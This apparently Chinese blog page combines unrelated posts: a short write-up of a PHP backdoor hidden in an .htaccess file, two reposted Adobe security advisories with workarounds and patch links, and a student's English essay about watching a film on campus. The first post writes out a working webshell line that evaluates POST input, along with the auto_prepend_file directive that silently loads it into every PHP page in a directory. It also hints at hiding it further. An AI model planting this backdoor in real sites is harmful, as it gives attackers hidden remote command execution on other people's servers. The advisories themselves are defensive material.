.htaccess后门

 
PHP手册,常看常新:)
PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置.
恰好,找到两个邪恶的属性:
auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。
特殊值 none 禁止了自动前缀。
auto_append_file string
指定在主文件之后自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。
特殊值 none 禁止了自动后缀。
Note: 如果脚本通过 exit() 终止,则自动后缀不会发生。
于是很简单,利用.htaccess就能包含文件,并且不用修改任何对方的php文件,同目录下所有php文件就被植入木马了.管理员不注意的话可能就被忽略掉.
本地测试了一下,写了个.htaccess文件到我的sphpblog目录中.
#<?php eval($_POST[cmd]);?>
php_value auto_prepend_file “.htaccess”
然后随意访问一下sphpblog中的任意文件.

当然直接包含.haccess文件太明显了,上面一对无关和出错信息会出卖你的后门的.我这里只是PoC,要包含什么就随便各位了.
哦,还有一点,会很方便:
include_path “.;/path/to/php/pear” PHP_INI_ALL
什么意思我就不说了.各位自己琢磨吧,呵呵

Adobe Form Designer和Form Client多个缓冲区溢出漏洞

 
受影响系统:
Adobe Form Designer/Client 5.0
描述:
——————————————————————————–
BUGTRAQ ID: 28210
CVE(CAN) ID: CVE-2007-6253

Adobe Form Designer是Adobe Designer产品家族的成员,用于自动生成表单、捕获并处理数据。

Adobe Form Designer及其客户端提供了多个ActiveX控件,其中FileDlg.dll库所提供的Adobe File Dialog Button控件和SvrCopy.dll库所提供的Adobe Copy to Server对象中存在缓冲区溢出漏洞。如果用户受骗访问了恶意网页的话,就可能触发这些溢出,导致执行任意指令。

<*来源:Will Dormann

链接:http://secunia.com/advisories/29330/
http://www.kb.cert.org/vuls/id/362849
http://www.adobe.com/support/security/bulletins/apsb08-09.html
*>

建议:
——————————————————————————–
临时解决方法:

* 在IE中禁用Adobe Form ActiveX控件,为以下CLSID设置kill bit:

{00A2A192-4929-11D1-BA6C-080009D7FAD2}
{D10E546F-3AF9-11D1-BA6C-080009D7FAD2}

或者将以下文本保存为.REG文件或导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{00A2A192-4929-11D1-BA6C-080009D7FAD2}] “Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{D10E546F-3AF9-11D1-BA6C-080009D7FAD2}] “Compatibility Flags”=dword:00000400

厂商补丁:

Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://download.adobe.com/pub/adobe/server/formclient/win/p_des_5_0_5990.zip
http://download.adobe.com/pub/adobe/server/formclient/win/p5_0_5990.zip

Adobe ColdFusion多个跨站脚本及无效日志漏洞

 
受影响系统:
Adobe ColdFusion MX 7.02
Adobe ColdFusion MX 7.01
Adobe ColdFusion MX 7.00
Adobe ColdFusion 8
描述:
——————————————————————————–
BUGTRAQ ID: 28205,28207
CVE(CAN) ID: CVE-2008-0643,CVE-2008-0644,CVE-2008-1203

ColdFusion MX是一款高效的网络应用服务器开发环境,具有很高的易用性和开发效率,基于标准的Java技术,可以与XML、Web Services和Microsoft.NET环境相集成。

如果ColdFusion应用的Application.cfm或Application.cfc包含有setEncoding函数的话,远程攻击者就可以通过提交恶意请求执行跨站脚本攻击。

ColdFusion没有正确地过滤某些CGI变量便返回给了用户,这允许远程攻击者通过篡改User Agent执行跨站脚本攻击,在用户浏览器会话中注入并执行任意HTML和脚本代码。

ColdFusion没有记录到管理界面失败的登录尝试,这可能便于攻击者执行暴力猜测攻击。

<*来源:Shigeyoshi Muraoka

链接:http://secunia.com/advisories/29332/
http://www.adobe.com/support/security/bulletins/apsb08-06.html
http://www.adobe.com/support/security/bulletins/apsb08-07.html
http://www.adobe.com/support/security/bulletins/apsb08-08.html
*>

建议:
——————————————————————————–
厂商补丁:

Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.adobe.com/support/coldfusion/ts/documents/kb403212/hf702-70734.zip
http://www.adobe.com/support/coldfusion/ts/documents/kb403070/chf8000003.zip
http://www.adobe.com/support/security/bulletins/downloads/CF8_APSB08-0_8.zip
http://www.adobe.com/support/security/bulletins/downloads/CFMX7_APSB08_-08.zip

任课教师:任一涛

20041050098

两题任选一个

1. One day life at campus

2. An interesting thing I remenbered at compus

我选择了第2题,得分91。

An interesting thing I remembered at campus

        The interesting thing I remebered at campus is wathcing “The Lord of the Ring”.

        It was happened when I was in the grade One in the college. I was a new student in the campus. I was curious about everything. New man needn’t to do many things, so I always had a lot of sapre time. Occasionally, I saw a notice said the movie “The lord of the Ring” has being shown at every sunday night from 19:00 to 22:00. I went there at time.

        It was suprised that there were only a couple of students. I thought that there would be so many students that I had to sit back. I took my seat in the front. The movie has already began. What impressed me was not the movie, but the environment. I had watched the movie on TV before. It was a good movie that  I still like it. But the environment really gave me more that I expected. The scient room, few people, glommy light, the big screen and the perfect sound effect. It brought me into the middle land and into the legend.

        I enjoyed it and went there every sunday night. It never let me down. Till now, I still can not forget that environment. It has stored in my brain like an brilliant art.